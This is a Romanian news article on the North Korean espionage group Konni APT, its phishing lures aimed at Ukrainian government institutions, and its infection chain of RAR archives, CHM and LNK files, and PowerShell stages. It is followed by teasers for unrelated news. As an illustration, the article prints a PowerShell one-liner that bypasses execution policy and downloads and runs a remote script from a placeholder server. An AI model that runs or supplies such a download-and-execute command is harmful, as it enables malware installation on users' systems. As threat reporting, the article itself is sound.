Prima pagină » Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Gruparea nord-coreeană de spionaj cibernetic Konni APT a lansat un atac informatic îndreptat împotriva Ucrainei prin care vizează în special instituțiile guvernamentale.

Această ofensivă digitală are ca scop monitorizarea conflictului ruso-ucrainean și colectarea de date despre strategiile militare ale Kremlinului.

Cine sunt Konni APT?

Coreea de Nord

Konni APT, cunoscută și sub denumirile de Opal Sleet, Osmium, TA406 și Vedalia, este o grupare nord-coreeană de spionaj cibernetic. Activ de peste un deceniu, grupul a țintit entități guvernamentale din Coreea de Sud, Statele Unite, Rusia și, mai nou, Ucraina.

Arma principală a nord-coreenilor se numește Konni RAT (n.n. – Remote Access Trojan), cunoscut și ca UpDog. Este vorba despre un program malware (software rău intenționat) versatil, care le permite supravegherea continuă și chiar controlul total al dispozitivelor compromise.

Cea mai recentă campanie a hackerilor Konni a început în februarie 2025. Aceasta vizează colectarea de informații cu privire la „traiectoria invaziei ruse” în Ucraina, potrivit Medium.com. Departe de a se limita la interceptarea comunicațiilor, malware-ul vizează perspective strategice, politice și militare, care pot influența deciziile Phenianului în ceea ce privește sprijinul acordat Rusiei în acest conflict militar.

Phishing mascat în expertiză geopolitică

Foto: Proofpoint.com

Tactica preferată a atacatorilor presupune trimiterea de e-mailuri aparent inofensive, dar atent fabricate, care se dau drept comunicări din partea unor așa-zise grupuri de experți în politică și securitate.

Potrivit Proofpoint, o firmă de top în domeniul securității informatice pentru întreprinderi, mesajele fac referire la subiecte sensibile din actualitatea ucraineană. Este vorba despre destituiri la nivel înalt în armata ucraineană sau alegerile prezidențiale din Ucraina pentru a câștiga încrederea destinatarilor.

Odată ce victima deschide fișierul atașat, care de obicei este o arhivă RAR cu parolă denumită „Analytical Report.rar”, se execută un fișier CHM capabil să lanseze un script PowerShell. Acesta inițiază o etapă secundară a atacului informatic, descărcând alte scripturi menite să extragă informații sensibile, să stabilească accesul pe termen lung și, probabil, să pregătească terenul pentru un backdoor personalizat.

De obicei, hackerii Konni APT se bazează pe platforme gratuite precum Gmail, Outlook sau ProtonMail pentru a trimite în mod repetat mesajele periculoase, iar descărcările sunt găzduite pe servicii precum MEGA. În unele variante ale atacurilor au fost detectate și metode alternative, precum fișiere HTML care duc la arhive ZIP cu fișiere LNK și PDF. Aparent inofensive, acestea ascund componente malware capabile să execute comenzi VBScript și PowerShell, relatează Cybersecuritynews.com.

O structură tipică de comenzi ar putea semăna cu: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command „$c=’IEX (New-Object Net.WebClient).DownloadString(”http://compromised-server.com/payload.ps1”)’; iex $c”

Deși payload-ul final nu a fost identificat de cercetători în toate cazurile, toate indiciile duc spre existența unei componente de tip backdoor, concepută să faciliteze supravegherea de lungă durată și eventuale acțiuni de sabotaj digital.

Ce urmărește Konni APT

Experții în securitate cibernetică spun că scopul acestor atacuri este de a oferi regimului de la Phenian o imagine clară a angajamentului militar ucrainean, dar și a gradului de implicare al Rusiei.

Se bănuiește că aceste date ar putea influența deciziile liderilor nord-coreeni în ceea ce privește eventuale mișcări suplimentare, fie trimiterea de personal militar, fie furnizarea de armament către Moscova.

Gruparea nord-coreeană nu se află la primul atac de acest gen. Konni a desfășurat anterior operațiuni de tip spear phishing menite să compromită conturi de e-mail, folosind alerte false de securitate Microsoft pentru a colecta acreditări. De exemplu, au circulat mesaje care avertizau despre „activitate suspectă de autentificare”, redirecționând victimele către site-uri capcană precum „jetmf[.]com”.

Alte articole importante
România și Grecia își extind infrastructura pentru vehicule electrice. UE finanțează noi stații de încărcare de mare putere
România și Grecia își extind infrastructura pentru vehicule electrice. UE finanțează noi stații de încărcare de mare putere
Uniunea Europeană continuă investițiile în mobilitatea electrică, iar România se numără printre beneficiarii direcți ai unui nou proiect strategic care vizează dezvoltarea infrastructurii de încărcare pentru vehicule electrice. Prin programul Blue Route 4E, vor fi instalate peste o sută de puncte de încărcare rapidă și ultra-rapidă, menite să susțină tranziția către transportul sustenabil. Inițiativa este […]
Leul atinge un minim istoric. Euro trece de 5,14 lei pe fondul tensiunilor politice
Leul atinge un minim istoric. Euro trece de 5,14 lei pe fondul tensiunilor politice
Leul a înregistrat cea mai slabă valoare din istorie în raport cu euro, într-un context marcat de instabilitate politică și presiuni pe piața financiară. Cursul oficial anunțat de Banca Națională a României a urcat la 5,14 lei pentru un euro, stabilind un nou record negativ pentru leu. Evoluția vine după o perioadă de volatilitate accentuată, […]
Controverse uriașe în jurul programului SAFE. România se împrumută masiv pentru apărare, dar banii ajung în mare parte în afara țării
Controverse uriașe în jurul programului SAFE. România se împrumută masiv pentru apărare, dar banii ajung în mare parte în afara țării
Programul european SAFE, destinat consolidării apărării și industriei militare din Uniunea Europeană, a devenit subiectul unei dezbateri intense în România, după apariția unor documente care indică direcția principală a contractelor din primul pachet aprobat de autorități. În centrul controversei se află Guvernul condus de Ilie Bolojan, acuzat că direcționează o parte semnificativă din fondurile împrumutate […]
Prețul petrolului explodează la maximele ultimilor ani
Prețul petrolului explodează la maximele ultimilor ani
Prețul petrolului a atins niveluri record pentru ultimii patru ani, pe fondul tensiunilor tot mai accentuate din Orientul Mijlociu și al temerilor privind blocarea uneia dintre cele mai importante rute energetice ale lumii. Evoluția vine într-un moment delicat pentru economia globală și amplifică presiunile asupra consumatorilor, companiilor și guvernelor. Creșterea abruptă a cotațiilor este alimentată […]
Profitul BYD se prăbușește la început de an. Semnal de alarmă pentru liderul global al mașinilor electrice
Companii
Profitul BYD se prăbușește la început de an. Semnal de alarmă pentru liderul global al mașinilor electrice
Producătorul chinez de vehicule electrice BYD a raportat una dintre cele mai slabe evoluții financiare din ultimii ani, după ce profitul companiei s-a redus drastic în primul trimestru din 2026. Datele oficiale indică o combinație de factori negativi, printre care scăderea vânzărilor pe piața internă din China și intensificarea competiției în sectorul auto electric. Rezultatele […]
Merz atacă SUA și Bruxelles-ul, în timp ce economia Germaniei se prăbușește
Merz atacă SUA și Bruxelles-ul, în timp ce economia Germaniei se prăbușește
Economia celei mai puternice țări din Europa traversează o perioadă dificilă, iar reacțiile politice devin din ce în ce mai vizibile. Cancelarul german Friedrich Merz a început să își îndrepte criticile spre exterior, vizând atât Statele Unite, cât și instituțiile europene, într-un context economic marcat de stagnare și tensiuni politice interne în creștere. Declarațiile recente […]